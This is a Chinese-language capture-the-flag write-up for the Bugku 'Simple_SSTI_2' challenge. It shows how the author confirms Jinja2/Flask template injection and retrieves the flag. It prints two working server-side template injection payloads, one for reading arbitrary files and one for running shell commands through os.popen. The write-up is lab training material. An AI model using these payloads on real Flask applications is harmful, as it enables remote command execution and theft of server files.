bugku Simple_SSTI_2 wp

题目是 Simple SSTI 说明是模板注入
bugku Simple_SSTI_2 wp_第1张图片
传参测试
bugku Simple_SSTI_2 wp_第2张图片
2*4被执行了
先传点错误语句看看是什么模板
bugku Simple_SSTI_2 wp_第3张图片
得到信息是python的flask模板注入题,而且是python3.7
网上查找一些payload
文件读写

{
     % for c in [].__class__.__base__.__subclasses__() %}{
     % if c.__name__=='catch_warnings' %}{
     {
      c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{
     % endif %}{
     % endfor %}

命令执行

{
     % for c in [].__class__.__base__.__subclasses__() %}{
     % if c.__name__=='catch_warnings' %}{
     {
      c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{
     % endif %}{
     % endfor %}

先执行ls看看
在这里插入图片描述
看到flag就在当前目录了
执行cat flag就能拿到flag
bugku Simple_SSTI_2 wp_第4张图片
或者用读文件的payload
在这里插入图片描述
也可以拿到flag

你可能感兴趣的:(#,ctf做题记录,ssti模板注入,python)